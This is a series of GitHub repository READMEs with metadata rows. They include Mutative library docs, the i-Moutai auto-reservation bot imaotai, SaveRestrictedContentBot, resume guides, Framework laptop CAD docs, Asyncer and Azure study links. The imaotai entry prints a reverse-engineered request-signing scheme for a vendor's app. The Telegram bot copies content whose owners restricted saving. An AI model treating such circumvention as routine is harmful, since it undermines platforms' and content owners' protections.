list: [{ text: 'coding' }],
};
const state = create(baseState, (draft) => {
draft.list.push({ text: 'learning' });
});
expect(state).not.toBe(baseState);
expect(state.list).not.toBe(baseState.list);
```
`create(baseState, (draft) => void, options?: Options): newState`
The first argument of `create()` is the base state. Mutative drafts it and passes it to the arguments of the draft function, and performs the draft mutation until the draft function finishes, then Mutative will finalize it and produce the new state.
Use `create()` for more advanced features by [setting `options`](#createstate-fn-options).
## APIs
- [`create()`](#create)
- [`apply()`](#apply)
- [`current()`](#current)
- [`original()`](#original)
- [`unsafe()`](#unsafe)
- [`isDraft()`](#isdraft)
- [`isDraftable()`](#isdraftable)
- [`rawReturn()`](#rawreturn)
- [`makeCreator()`](#makecreator)
- [`markSimpleObject()`](#marksimpleobject)
### `create()`
Use `create()` for draft mutation to get a new state, which also supports currying.
```ts
import { create } from 'mutative';
const baseState = {
foo: 'bar',
list: [{ text: 'todo' }],
};
const state = create(baseState, (draft) => {
draft.foo = 'foobar';
draft.list.push({ text: 'learning' });
});
```
In this basic example, the changes to the draft are 'mutative' within the draft callback, and `create()` is finally executed with a new immutable state.
#### `create(state, fn, options)`
> Then options is optional.
- strict - `boolean`, the default is false.
> Forbid accessing non-draftable values in strict mode(unless using [unsafe()](#unsafe)).
> When strict mode is enabled, mutable data can only be accessed using [`unsafe()`](#unsafe).
> **It is recommended to enable `strict` in development mode and disable `strict` in production mode.** This will ensure safe explicit returns and also keep good performance in the production build. If the value that does not mix any current draft or is `undefined` is returned, then use [rawReturn()](#rawreturn).
- enablePatches - `boolean | { pathAsArray?: boolean; arrayLengthAssignment?: boolean; }`, the default is false.
> Enable patch, and return the patches/inversePatches.
> If you need to set the shape of the generated patch in more detail, then you can set `pathAsArray` and `arrayLengthAssignment`。`pathAsArray` default value is `true`, if it's `true`, the path will be an array, otherwise it is a string; `arrayLengthAssignment` default value is `true`, if it's `true`, the array length will be included in the patches, otherwise no include array length(**NOTE**: If `arrayLengthAssignment` is `false`, it is fully compatible with JSON Patch spec, but it may have additional performance loss), [view related discussions](https://github.com/unadlib/mutative/issues/6).
- enableAutoFreeze - `boolean`, the default is false.
> Enable autoFreeze, and return frozen state, and enable circular reference checking only in `development` mode.
- mark - `(target) => ('mutable'|'immutable'|function) | (target) => ('mutable'|'immutable'|function)[]`
> Set a mark to determine if the value is mutable or if an instance is an immutable, and it can also return a shallow copy function(`AutoFreeze` and `Patches` should both be disabled, Some patches operation might not be equivalent).
> When the mark function is (target) => 'immutable', it means all the objects in the state structure are immutable. In this specific case, you can totally turn on `AutoFreeze` and `Patches`.
> `mark` supports multiple marks, and the marks are executed in order, and the first mark that returns a value will be used.
> When a object tree node is marked by the `mark` function as `mutable`, all of its child nodes will also not be drafted by Mutative and will retain their original values.
#### `create()` - Currying
- create `draft`
```ts
const [draft, finalize] = create(baseState);
draft.foobar.bar = 'baz';
const state = finalize();
```
> Support set options such as `const [draft, finalize] = create(baseState, { enableAutoFreeze: true });`
- create `producer`
```ts
const produce = create((draft) => {
draft.foobar.bar = 'baz';
});
const state = produce(baseState);
```
> Also support set options such as `const produce = create((draft) => {}, { enableAutoFreeze: true });`
### `apply()`
Use `apply()` for applying patches to get the new state.
```ts
import { create, apply } from 'mutative';
const baseState = {
foo: 'bar',
list: [{ text: 'todo' }],
};
const [state, patches, inversePatches] = create(
baseState,
(draft) => {
draft.foo = 'foobar';
draft.list.push({ text: 'learning' });
},
{
enablePatches: true,
}
);
const nextState = apply(baseState, patches);
expect(nextState).toEqual(state);
const prevState = apply(state, inversePatches);
expect(prevState).toEqual(baseState);
```
### `current()`
Get the current value from a draft.
- For any draft where a child node has been modified, the state obtained by executing current() each time will be a new reference object.
- For a draft where no child nodes have been modified, executing current() will always return the original state.
> It is recommended to minimize the number of times current() is executed when performing read-only operations, ideally executing it only once.
```ts
const state = create({ a: { b: { c: 1 } }, d: { f: 1 } }, (draft) => {
draft.a.b.c = 2;
expect(current(draft.a)).toEqual({ b: { c: 2 } });
// The node `a` has been modified.
expect(current(draft.a) === current(draft.a)).toBeFalsy();
// The node `d` has not been modified.
expect(current(draft.d) === current(draft.d)).toBeTruthy();
});
```
### `original()`
Get the original value from a draft.
```ts
const baseState = {
foo: 'bar',
list: [{ text: 'todo' }],
};
const state = create(baseState, (draft) => {
draft.foo = 'foobar';
draft.list.push({ text: 'learning' });
expect(original(draft.list)).toEqual([{ text: 'todo' }]);
});
```
### `unsafe()`
When strict mode is enabled, mutable data can only be accessed using `unsafe()`.
```ts
const baseState = {
list: [],
date: new Date(),
};
const state = create(
baseState,
(draft) => {
unsafe(() => {
draft.date.setFullYear(2000);
});
// or return the mutable data:
// const date = unsafe(() => draft.date);
},
{
strict: true,
}
);
```
### `isDraft()`
Check if a value is a draft.
```ts
const baseState = {
date: new Date(),
list: [{ text: 'todo' }],
};
const state = create(baseState, (draft) => {
expect(isDraft(draft.date)).toBeFalsy();
expect(isDraft(draft.list)).toBeTruthy();
});
```
### `isDraftable()`
Check if a value is draftable
```ts
const baseState = {
date: new Date(),
list: [{ text: 'todo' }],
};
expect(isDraftable(baseState.date)).toBeFalsy();
expect(isDraftable(baseState.list)).toBeTruthy();
```
> You can set a mark to determine if the value is draftable, and the mark function should be the same as passing in `create()` mark option.
### `rawReturn()`
For return values that do not contain any drafts, you can use `rawReturn()` to wrap this return value to improve performance. It ensure that the return value is only returned explicitly.
```ts
const baseState = { id: 'test' };
const state = create(baseState as { id: string } | undefined, (draft) => {
return rawReturn(undefined);
});
expect(state).toBe(undefined);
```
> If the return value mixes drafts, you should not use `rawReturn()`.
```ts
const baseState = { a: 1, b: { c: 1 } };
const state = create(baseState, (draft) => {
if (draft.b.c === 1) {
return {
...draft,
a: 2,
};
}
});
expect(state).toEqual({ a: 2, b: { c: 1 } });
expect(isDraft(state.b)).toBeFalsy();
```
If you use `rawReturn()`, we recommend that you enable `strict` mode in development.
```ts
const baseState = { a: 1, b: { c: 1 } };
const state = create(
baseState,
(draft) => {
if (draft.b.c === 1) {
return rawReturn({
...draft,
a: 2,
});
}
},
{
strict: true,
}
);
// it will warn `The return value contains drafts, please don't use 'rawReturn()' to wrap the return value.` in strict mode.
expect(state).toEqual({ a: 2, b: { c: 1 } });
expect(isDraft(state.b)).toBeFalsy();
```
### `makeCreator()`
`makeCreator()` only takes [options](#createstate-fn-options) as the first argument, resulting in a custom `create()` function.
```ts
const baseState = {
foo: {
bar: 'str',
},
};
const create = makeCreator({
enablePatches: true,
});
const [state, patches, inversePatches] = create(baseState, (draft) => {
draft.foo.bar = 'new str';
});
```
### `markSimpleObject()`
`markSimpleObject()` is a mark function that marks all objects as immutable.
```ts
const baseState = {
foo: {
bar: 'str',
},
simpleObject: Object.create(null),
};
const state = create(
baseState,
(draft) => {
draft.foo.bar = 'new str';
draft.simpleObject.a = 'a';
},
{
mark: markSimpleObject,
}
);
expect(state.simpleObject).not.toBe(baseState.simpleObject);
```
[View more API docs](./docs/README.md).
## Using TypeScript
- `castDraft()`
- `castImmutable()`
- `Draft<T>`
- `Immutable<T>`
- `Patches`
- `Patch`
- `Options<O, F>`
## Integration with React
- [use-mutative](https://github.com/mutativejs/use-mutative) - A 2-6x faster alternative to useState with spread operation
- [use-travel](https://github.com/mutativejs/use-travel) - A React hook for state time travel with undo, redo, reset and archive functionalities.
## FAQs
- I'm already using Immer, can I migrate smoothly to Mutative?
Yes. Unless you have to be compatible with Internet Explorer, Mutative supports almost all of Immer features, and you can easily migrate from Immer to Mutative.
> Migration is also not possible for React Native that does not support Proxy. React Native uses a new JS engine during refactoring - Hermes, and it (if < v0.59 or when using the Hermes engine on React Native < v0.64) does [not support Proxy on Android](https://github.com/facebook/hermes/issues/33), but [React Native v0.64 with the Hermes engine support Proxy](https://reactnative.dev/blog/2021/03/12/version-0.64#hermes-with-proxy-support).
- Can Mutative be integrated with Redux?
Yes. Mutative supports return values for reducer, and `redux-toolkit` is considering support for [configurable `produce()`](https://github.com/reduxjs/redux-toolkit/pull/3074).
## Migration from Immer to Mutative
> [mutative-compat](https://github.com/exuanbo/mutative-compat) - Mutative wrapper with full Immer API compatibility, you can use it to quickly migrate from Immer to Mutative.
1. `produce()` -> `create()`
Mutative auto freezing option is disabled by default, Immer auto freezing option is enabled by default (if disabled, Immer performance will have a more huge drop).
> You need to check if auto freezing has any impact on your project. If it depends on auto freezing, you can enable it yourself in Mutative.
```ts
import produce from 'immer';
const nextState = produce(baseState, (draft) => {
draft[1].done = true;
draft.push({ title: 'something' });
});
```
Use Mutative
```ts
import { create } from 'mutative';
const nextState = create(baseState, (draft) => {
draft[1].done = true;
draft.push({ title: 'something' });
});
```
2. `Patches`
```ts
import { produceWithPatches, applyPatches } from 'immer';
enablePatches();
const baseState = {
age: 33,
};
const [nextState, patches, inversePatches] = produceWithPatches(
baseState,
(draft) => {
draft.age++;
}
);
const state = applyPatches(nextState, inversePatches);
expect(state).toEqual(baseState);
```
Use Mutative
```ts
import { create, apply } from 'mutative';
const baseState = {
age: 33,
};
const [nextState, patches, inversePatches] = create(
baseState,
(draft) => {
draft.age++;
},
{
enablePatches: true,
}
);
const state = apply(nextState, inversePatches);
expect(state).toEqual(baseState);
```
3. Return `undefined`
```ts
import produce, { nothing } from 'immer';
const nextState = produce(baseState, (draft) => {
return nothing;
});
```
Use Mutative
```ts
import { create, rawReturn } from 'mutative';
const nextState = create(baseState, (draft) => {
return rawReturn(undefined);
});
```
## Contributing
Mutative goal is to provide efficient and immutable updates. The focus is on performance improvements and providing better APIs for better development experiences. We are still working on it and welcome PRs that may help Mutative.
Development Workflow:
- Clone Mutative repo.
- Run `yarn install` to install all the dependencies.
- Run `yarn prettier` to format the code.
- `yarn test --watch` runs an interactive test watcher.
- Run `yarn commit` to make a git commit.
## License
Mutative is [MIT licensed](https://github.com/unadlib/mutative/blob/main/LICENSE).
| Efficient immutable updates, 2-6x faster than naive handcrafted reducer, and more than 10x faster than Immer. | immer,immutability,immutable,reducer,redux,mutable,mutation,state-management,mutative,react | 23 | 7 | 18 | 432 | 6 | 16 | 3 |
insoxin/imaotai | # imaotai
i茅台app 每日自动预约 抢茅台
软件免费,无任何盈利 不要相信任何收费.唯一更新地址https://github.com/insoxin/imaotai/
更新一下:近日很多朋友发邮件咨询新版不能用,旧版客户端提示让升级新版.这个不多说,在发出这个项目没多久就有贵州茅台的企业微信加了我,交流了很多.并且也受邀参观了一下,蹭了几顿饭.吃人嘴软拿人手短,所以后续也没在更新相关(原因之一).有相关学习研究的同学可以参考我博客历史文章已淘汰的算法.
**再更新一下,我邮箱每周末一打开几百封邮件有点影响使用体验了,,建了微信讨论群,群内没有成品软件. 并且入群费两百,有需求的同学,备注留imaotai + 邮箱,看到发你入群邀请**
![image.png](https://raw.githubusercontent.com/insoxin/API/master/Sponsor.jpg)
# 使用方法
## 1.拉取镜像
```docker
docker pull insoxin/imaotai:latest
```
## 2.创建容器
```docker
docker run -dit --name imaotai -p 1499:1499 -v $PWD/imaotai/config:/go/src/imaotai/config --restart unless-stopped insoxin/imaotai:latest
```
## 3.配置参数
### 配置config.json
下载下载https://github.com/insoxin/imaotai/blob/main/config/config.json 至本地 /root/imaotai/config/config.json
修改本地/root/imaotai/config/config.json参数
User-Agent,Client_Secret,Cookie.必填
还有经纬度不要默认(APP数据以高德地图为准) 程序会就近预约最近距离店铺
若不想预约太远店铺,可设置GeoKM参数 默认0无限制
其他配置不懂的默认即可
默认每天九点执行(淘宝时间库),预约抢购页面获取到的前四个商品.
### 配置sendNotify.js 通知
下载https://github.com/insoxin/imaotai/blob/main/config/sendNotify.js 至本地/root/imaotai/config/sendNotify.js
sendNotify.js是通知文件按需修改
```json
{
"Main": {
"Title": "insoxin/imaotai",
"Open": "1,2,3,4",
"cron": "0 0 9 * * *",
"Tzone": "http://api.m.taobao.com/rest/api3.do?api=mtop.common.getTimestamp",
"MT-APP-Version": "1.0.0",
"GeoN": "26.598194",
"GeoE": "106.707410",
"GeoKM":"0",
"sendNotify": "/config/sendNotify.js",
"oksendNotify": "true"
},
"user": {
"Cookie": "",
"Origin": "https://h5.moutai519.com.cn",
"Client_Secret": "aaa",
"User-Agent": "Mozilla/5.0 (iPhone; CPU iPhone OS 15_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 moutaiapp/1.0.6 device-id/insoxin/imaotai"
},
"Notice": "通知中的标题"
}
MD5(2af72f100c356273d46284f6fd1dfc08+数据排序+时间戳)
https://blog.isoyu.com/archives/imaotaimt-device-idmt-r-md5jiajiemi.html
```
## 4.重启 imaotai
## 5.点个star 再进 https://github.com/insoxin/ 点follow 关注一下 项目被ban了 我会第一时间更新 新项目
![image.png](https://blog.isoyu.com/wp-content/uploads/2022/04/2022040300072260.jpg)
| i茅台app 每日自动预约 抢茅台 | null | 1 | 2 | 1 | 42 | 0 | 1 | 0 |
vasusen-code/SaveRestrictedContentBot | <h1 align="center">
<b>Save restricted content Bot</b>
</h1>
Contact: [Telegram](https://t.me/MaheshChauhan)
A stable telegram bot to get restricted messages with custom thumbnail support , made by Mahesh Chauhan.
- works for both public and private chats
- Custom thumbnail support for Pvt medias
- supports text and webpage media messages
- Faster speed
- Forcesubscribe available
- To save from bots send link in this format : `t.me/b/bot_username/message_id` (use plus messenger for message_id)
- `/batch` - (For owner only) Use this command to save upto 100 files from a pvt or public restricted channel at once.
- `/cancel` - Use this to stop batch
- Time delay is added to avoid FloodWait and keep user account safe.
# Variables
- `API_ID`
- `API_HASH`
- `SESSION`
- `BOT_TOKEN`
- `AUTH` - Owner user id
- `FORCESUB` - Public channel username without '@'. Don't forget to add bot in channel as administrator.
# Get API & PYROGRAM string session from:
API: [API scrapper Bot](https://t.me/USETGSBOT) or [Telegram.org](https://my.telegram.org/auth)
PYROGRAM SESSION: [SessionGen Bot](https://t.me/SessionStringGeneratorRobot) or [![Run on Repl.it](https://replit.com/badge/github/vasusen-code/saverestrictedcontentbot)](https://replit.com/@levinalab/Session-Generator#main.py)
BOT TOKEN: @Botfather on telegram
# Deploy
Deploy on `VPS`
Easy Method:
- Intall docker-compose
- Fill in the variables in docker-compose.yml file using your favorite text editor or nano
- Start the container
```
sudo apt install docker-compose -y
nano docker-compose.yml
sudo docker-compose up --build
```
The hard Way:
- Fill vars in your fork in [this](https://github.com/vasusen-code/SaveRestrictedContentBot/blob/master/main/__init__.py) file as shown in this [picture](https://t.me/MaheshChauhan/36)
- enter all the below commands
```
sudo apt update
sudo apt install ffmpeg git python3-pip
git clone your_repo_link
cd saverestrictedcontentbot
pip3 install -r requirements.txt
python3 -m main
```
- if you want bot to be running in background then enter `screen -S srcb` before `python3 -m main`
- after `python3 -m main`, click ctrl+A, ctrl+D
- if you want to stop bot, then enter `screen -r srcb` and to kill screen enter `screen -S srcb -X quit`.
Deploy your bot on `Render`
Tutorial - [Click here](https://telegra.ph/SRCB-on-Render-05-17)
Deploy your bot on `heroku`
» Method - 1:
- Star the repo, and fork it in desktop mode
- Go to settings of your forked repo
- Rename your repo by any other name
- Click on [![Deploy](https://www.herokucdn.com/deploy/button.svg)](https://heroku.com/deploy)
» Method - 2:
- Star the repo, and fork it in desktop mode
- create app in heroku
- go to settings of app›› config vars›› add all variables
- add buildpacks
- connect to github and deploy
- turn on dynos
Buildpacks for manual deploy:
- `heroku/python`
- `https://github.com/jonathanong/heroku-buildpack-ffmpeg-latest.git`
Deploy your bot on `Okteto` [Useless]
Tutorial for okteto - [click here](https://telegra.ph/Okteto-Deploy-04-01)
[![Develop on Okteto](https://okteto.com/develop-okteto.svg)](https://cloud.okteto.com)
| Stable telegram bot to save Restricted content with custom thumbnail support. | telegram,bot,telegram-bot,save,restricted,content,forward,clone | 0 | 3 | 61 | 656 | 50 | 3 | 0 |
codingmonster-tv/Awesome_Resume_Portfolio | # Awesome_Resume_Portfolio
개발자의 서류 작성에 유용한 자료들을 모아두는 Repo입니다.
- [**이력서 포맷/예시 바로가기 링크**](https://docs.google.com/document/d/1Y2Y7-DWO-0F68nsUxB-ObYbXTdQgBHu-Fw48yTYG6R0/edit?usp=sharing)
본 레포에서 제공하는 이력서 포맷은 여러 멘토링과 컨설팅을 통해 구직/구인을 해본 경험을 기반으로 100% 제 주관으로 만든 내용입니다. 본인의 마음에 들지 않는다면 적당히 수정하여 사용해주세요.
**특징**
- 개발자 채용 트랜드에 뒤쳐지는 항목들은 제거했습니다
- 사진, 주소, 장황한 자소설, 딱딱한 사람X/X코리아 스타일의 표, 쓸모없는 인적성 검사지 등
- 이런건 좀 자세히 적었으면 좋겠다 싶은 항목들은 추가했습니다
- 본인 기술 역량에 대한 요약 및 경험에 대한 요약
- 샘플 이력서와 여러 실제 적용 예시를 제공합니다
- 여러 케이스를 고려하다보니 불필요한 내용이 있을 수 있습니다
- 본인에게 맞게 삭제/수정해주세요
## 이력서 포맷 및 샘플
### 사용법
1. 다음의 Google Docs 문서에 접속한다 [**이력서 포맷/예시 바로가기 링크**](https://docs.google.com/document/d/1Y2Y7-DWO-0F68nsUxB-ObYbXTdQgBHu-Fw48yTYG6R0/edit?usp=sharing)
2. 사본 만들기를 통해 본인의 드라이브에 복제해간 후 수정한다 <img width="948" alt="image" src="https://user-images.githubusercontent.com/7837143/154478978-bd755bfe-3250-4c58-a6d6-c9f3b22e75a4.png">
3. 아래의 작성 가이드 및 샘플 이력서를 참고하여 이력서를 작성한다
4. 어딘가에 제출할때에는 Google Docs의 출력기능으로 PDF파일로 내보내거나, 공유하기 링크를 통해 제출한다
5. 본 Repo에 Star를 누른다
### 참고할만한 이력서 예시들
| 소유자 | 포지션 | 참고사항 |
| ------------- | ------------- | ------------- |
| [코몬(Repo Owner) 이력서](http://dongyi.kim) | 머신러닝 엔지니어 | 구글 Docs 사용 |
| [카카오페이 김현준님](https://www.youtube.com/watch?v=8xvYz0ldfEI) | 안드로이드 엔지니어 | 노션 포트폴리오 |
| [당근마켓 이정윤님](https://promm.dev/about/) | 프론트엔드 엔지니어 | 웹 이력서 |
| [카카오스타일 김석현(Lob)님](https://dev-lob.notion.site/26-Junior-Backend-Developer-e51c02b15e89401abe00604d95d4846d) | 백앤드 엔지니어 | 노션 포트폴리오 |
| [스타트업 리드 개발자 Samchon님](https://github.com/samchon/resume) | 백앤드 엔지니어 | 깃허브 이력서 |
| [차이코퍼레이션 Y0on2q(윤익후)님](https://github.com/ltnscp9028/Awesome_Resume_Portfolio/files/8951089/y0on2q_resume_rc3_mark.pdf) | 백앤드 엔지니어 | Adobe XD PDF |
| [라인플러스 박준성님](https://writtic.me) | 머신러닝 엔지니어 | 노션 포트폴리오 |
| [루닛 강철민님](https://github.com/codingmonster-tv/Awesome_Resume_Portfolio/files/8949609/Cholmin.Kang_CV_Final.pdf) | 머신러닝 리서쳐 | LaTex PDF |
| [GE 박진우님](https://github.com/codingmonster-tv/Awesome_Resume_Portfolio/files/8950899/Resume-Jinwoo-2022.mid_Descrete.pdf) | 임베디드 엔지니어 | Word PDF |
### 좋은 자료들
1. [유튜브 - 서류탈락하는 개발자 포트폴리오의 특징](https://www.youtube.com/watch?v=PJGsPohDuoA)
2. [유튜브 - 신입 개발자 이력서 작성 방법의 모든 것 1부 with 나동빈 이력서](https://www.youtube.com/watch?v=qeFJ6UwjxmU)
3. [유튜브 - 주니어 개발자 ‘실제’ 이력서 첨삭해 보았습니다](https://www.youtube.com/watch?v=1bcmmc2rTBE)
| 개발자를 위한 이력서 작성 가이드, 포맷 그리고 다양한 예시들 | resume,cv,coverletter,portfolio | 0 | 5 | 6 | 32 | 1 | 1 | 0 |
FrameworkComputer/Framework-Laptop-13 | # Framework Laptop 13
Documentation for the Mainboard and other key modules in the Framework Laptop 13 (available at https://frame.work/marketplace/mainboards).
We designed the Mainboard from the start as a standalone module to make upgrades easy in the Framework Laptop and to also work great as a high-performance single board computer using Intel’s 11th Gen Intel Core, 12th Gen Intel Core, and 13th Gen Intel Core processors along with AMD's Ryzen 7040 Series processors. All you need to do is insert memory, plug in a USB-C power adapter, and hit the tiny power button on-board, and you’ve got a powered-up computer. You can also pick up parts like a Bottom Cover Kit, Input Cover Kit, or Battery from the Marketplace to extend your setup with. See more on this at https://frame.work/blog/mainboard-availability-and-open-source-release.
We want to make it as easy as possible to build new projects and products that use the Mainboard, so this repository contains 2D and 3D CAD as well as electrical documentation to help you get started.
![mainboard_spread](https://user-images.githubusercontent.com/28994301/155036191-9f03d3c9-7e09-4d69-83da-5ba8b3641d95.jpg)
## License
Framework Laptop 13 © 2022 by Framework Computer Inc is licensed under CC BY 4.0.
To view a copy of this license, visit http://creativecommons.org/licenses/by/4.0/
## 3D CAD (in the base directory)
External 3D CAD of the system and main modules to enable development of 3D-printed replacement parts,
skins, cases, and other accessories. We're excited to see what you do with it!
## Mainboard
![Case](https://user-images.githubusercontent.com/28994301/187817348-42792225-093a-4b99-b51d-f74d154b59f4.png)
This contains 2D drawings of the Mainboard along with a couple of example 3D-printable cases.
Both of these are easy to print on home 3D printers. Since these are open source, you are free to modify, remix, and redistribute them however you’d like to.
It also contains the pinouts and part numbers of the connectors on the Mainboard.
All of this is a starting point for a broader set of open source Mainboard documentation to enable creation of fully compatible third-party Mainboards in the future.
## Battery
2D drawings, 3D CAD, and the pinout of the Battery to enable re-use.
## Display
2D drawings, 3D CAD, and the pinout of the Display to enable re-use.
## Fingerprint Reader
Pinout of the Fingerprint Reader.
## Touchpad
Pinout of the Touchpad connectors.
## Webcam
Pinout of the Webcam.
| Documentation for the Mainboard and other modules in the Framework Laptop 13 | framework,frameworklaptop | 0 | 8 | 13 | 81 | 12 | 2 | 1 |
tiangolo/asyncer | <p align="center">
<a href="https://asyncer.tiangolo.com"><img src="https://asyncer.tiangolo.com/img/logo-margin/logo-margin-vector.svg" alt="Asyncer"></a>
</p>
<p align="center">
<em>Asyncer, async and await, focused on developer experience.</em>
</p>
<p align="center">
<a href="https://github.com/tiangolo/asyncer/actions?query=workflow%3ATest" target="_blank">
<img src="https://github.com/tiangolo/asyncer/workflows/Test/badge.svg" alt="Test">
</a>
<a href="https://github.com/tiangolo/asyncer/actions?query=workflow%3APublish" target="_blank">
<img src="https://github.com/tiangolo/asyncer/workflows/Publish/badge.svg" alt="Publish">
</a>
<a href="https://coverage-badge.samuelcolvin.workers.dev/redirect/tiangolo/asyncer" target="_blank">
<img src="https://coverage-badge.samuelcolvin.workers.dev/tiangolo/asyncer.svg" alt="Coverage">
<a href="https://pypi.org/project/asyncer" target="_blank">
<img src="https://img.shields.io/pypi/v/asyncer?color=%2334D058&label=pypi%20package" alt="Package version">
</a>
</p>
---
**Documentation**: <a href="https://asyncer.tiangolo.com" target="_blank">https://asyncer.tiangolo.com</a>
**Source Code**: <a href="https://github.com/tiangolo/asyncer" target="_blank">https://github.com/tiangolo/asyncer</a>
---
**Asyncer** is a small library built on top of <a href="https://anyio.readthedocs.io/en/stable/" class="external-link" target="_blank">AnyIO</a>.
**Asyncer** has a small number of utility functions that allow working with `async`, `await`, and concurrent code in a more convenient way under my (<a href="https://twitter.com/tiangolo" class="external-link" target="_blank">@tiangolo - Sebastián Ramírez</a>) very opinionated and subjective point of view.
The main goal of **Asyncer** is to improve **developer experience** by providing better support for **autocompletion** and **inline errors** in the editor, and **more certainty** that the code is **bug-free** by providing better support for type checking tools like **mypy**.
**Asyncer** also tries to improve **convenience** and simplicity when working with **async** code **mixed** with regular <abbr title="synchronous code, code that is not async">**blocking code**</abbr>, allowing to use them together in a simpler way... again, under my very **subjective** point of view.
## 🚨 Warning
This small library only exists to be able to use these **utility functions** until (and if) they are integrated into **AnyIO**.
It will probably take some time for that to happen (or to be decided if it will be included or not).
So I made this to be able to use these ideas right now. 🤓
## Can I Use It?
Yes 🎉 (but continue reading).
You can use this and evaluate the **library API design** I'm proposing. It will probably be useful to know if it works and is useful for you (I hope so).
But still, consider this lab material, expect it to change a bit. 🧪
If you use it, **pin the exact Asyncer version** for your project, to make sure it all works.
Have **tests** for your project (as you should, anyway). And **upgrade the version** once you know that the new version continues to work correctly.
Still, it's **just 4 functions**, so there's not much to change, if you had to refactor your code to update something it would not be much.
And if you don't want to add `asyncer` as a dependency to your project, you can also just copy the main file and try out those functions, it's quite small (but in that case you won't get updates easily).
## Requirements
As **Asyncer** is based on **AnyIO** it will be also installed automatically when you install **Asyncer**.
## Installation
<div class="termy">
```console
$ pip install asyncer
---> 100%
Successfully installed asyncer anyio
```
</div>
## How to Use
You can read more about each of the use cases and utility functions in **Asyncer** in the <a href="https://asyncer.tiangolo.com/tutorial/" class="external-link" target="_blank">tutorial</a>.
As a sneak preview of one of the utilities, you can **call sync code from async code** using `asyncify()`:
```Python
import time
import anyio
from asyncer import asyncify
def do_sync_work(name: str):
time.sleep(1)
return f"Hello, {name}"
async def main():
message = await asyncify(do_sync_work)(name="World")
print(message)
anyio.run(main)
```
**Asyncer**'s `asyncify()` will use AnyIO underneath to do *the smart thing*, avoid blocking the main **async** event loop, and run the **sync**/blocking function in a **worker thread**.
### Editor Support
Everything in **Asyncer** is designed to get the best **developer experience** possible, with the best editor support.
* **Autocompletion** for function arguments:
<img class="shadow" src="https://asyncer.tiangolo.com/img/tutorial/asyncify/image01.png">
* **Autocompletion** for return values:
<img class="shadow" src="https://asyncer.tiangolo.com/img/tutorial/asyncify/image02.png">
* **Inline errors** in editor:
<img class="shadow" src="https://asyncer.tiangolo.com/img/tutorial/soonify/image02.png">
* Support for tools like **mypy**, that can help you verify that your **code is correct**, and prevent many bugs.
## License
This project is licensed under the terms of the [MIT license](https://github.com/tiangolo/asyncer/blob/main/LICENSE).
| Asyncer, async and await, focused on developer experience. | python,async,asyncio,trio,anyio | 7 | 13 | 152 | 203 | 2 | 13 | 8 |
johnthebrit/CertificationMaterials | # Certification Materials
A collection of materials related to my certification videos hosted on YouTube.
https://onboardtoazure.com (https://youtube.com/ntfaqguy)
Please [subscribe](https://www.youtube.com/channel/UCpIn7ox7j7bH_OFj7tYouOQ?sub_confirmation=1) and support my channel. Thank you.
I have a recommended full path with other useful links and materials at https://learn.onboardtoazure.com. This includes my content, links to Microsoft materials, exam sandbox environment links and more.
## Video and Whiteboard Index
Getting started learning Azure introduction video - https://youtu.be/V1Hk45XD6Qw
| Video/Playlist | Artifact |
|--|--|
| [AZ-900 Full Course](https://youtube.com/playlist?list=PLlVtbbG169nED0_vMEniWBQjSoxTsBYS3) | [AZ-900 Course Handout](https://github.com/johnthebrit/AZ900CertCourse/blob/main/John%20Savill's%20AZ-900%20Azure%20Fundamentals%20Certification%20Course%20Handout.pdf) |
| [AZ-900 Study Cram](https://youtu.be/tQp1YkB2Tgs) | [AZ-900 Study Cram Whiteboard](/whiteboards/AZ-900-Whiteboard.png) |
| [AI-900 Study Cram](https://youtu.be/E9aarWMLJw0) | [AI-900 Study Cram Whiteboard](/whiteboards/AI-900-Whiteboard.png) |
| [DP-900 Study Cram](https://youtu.be/0gtpasITVnk) | [DP-900 Study Cram Whiteboard](/whiteboards/DP-900-v2-whiteboard.png) |
| [MS-900 Study Cram](https://youtu.be/np9jfnwnO2c) | [MS-900 Study Cram Whiteboard](/whiteboards/MS-900v2.png) |
| [PL-900 Study Cram](https://youtu.be/lbPHM-MiEUA) | [PL-900 Study Cram Whiteboard](/whiteboards/PL-900-Whiteboard.png) |
| [SC-900 Study Cram](https://youtu.be/Bz-8jM3jg-8) | [SC-900 Study Cram Whiteboard](/whiteboards/SC-900-Whiteboard.png) |
| [AZ-104 Study Playlist](https://youtube.com/playlist?list=PLlVtbbG169nGlGPWs9xaLKT1KfwqREHbs) | |
| [AZ-104 Study Cram](https://youtu.be/VOod_VNgdJk) | [AZ-104 Study Cram Whiteboard](/whiteboards/AZ-104-Whiteboard.png) |
| [SC-100 Study Playlist](https://www.youtube.com/playlist?list=PLlVtbbG169nHcbeVtWUfP8BeEjGniBJeb) | |
| [SC-100 Study Cram](https://youtu.be/2Qu5gQjNQh4) | [SC-100 Study Cram Whiteboard](/whiteboards/SC-100-Whiteboard.png) |
| [SC-300 Study Playlist](https://youtube.com/playlist?list=PLlVtbbG169nGj4rfaMUQiKiBZNDlxoo0y) | |
| [SC-300 Study Cram](https://youtu.be/LGpgqRVG65g) | [SC-300 Study Cram Whiteboard](/whiteboards/SC-300-Whiteboard.png) |
| [AZ-500 Study Playlist](https://youtube.com/playlist?list=PLlVtbbG169nHw9T1L_CiLxC-DTwKu-BZG) | |
| [AZ-500 Study Cram](https://youtu.be/6vISzj-z8k4) | [AZ-500 Study Cram Whiteboard](/whiteboards/AZ-500-Whiteboard.png) |
| [AZ-700 Study Playlist](https://youtube.com/playlist?list=PLlVtbbG169nGeFODKRZhjqdSxFpSPXVOa) | |
| [AZ-700 Study Cram](https://youtu.be/nVZYDhB_M64) | [AZ-700 Study Cram Whiteboard](/whiteboards/AZ-700-Whiteboard.png) |
| [AZ-305 Study Playlist](https://youtube.com/playlist?list=PLlVtbbG169nHSnaP4ae33yQUI3zcmP5nP) | |
| [AZ-305 Study Cram](https://youtu.be/vq9LuCM4YP4) | [AZ-305 Study Cram Whiteboard](/whiteboards/AZ-305-Whiteboard.png) |
| [AZ-400 DevOps Master Class](https://youtube.com/playlist?list=PLlVtbbG169nFr8RzQ4GIxUEznpNR53ERq) | [DevOps Master Class Materials Repo](https://github.com/johnthebrit/DevOpsMC)|
Certification renewal experience video - https://youtu.be/L9luTi9LyXU | A collection of materials related to my certification videos | null | 2 | 1 | 0 | 18 | 0 | 1 | 0 |
Modos-Labs/Glider | # Glider
Open-source Eink monitor with an emphasis on low latency.
Note: This repo only contains the hardware design, the gateware running on the FPGA is my open-source [Caster EPDC](https://gitlab.com/zephray/Caster/) design. This README also contains information about the Caster as well.
![Hardware Photo](assets/hw_with_screen.jpg)
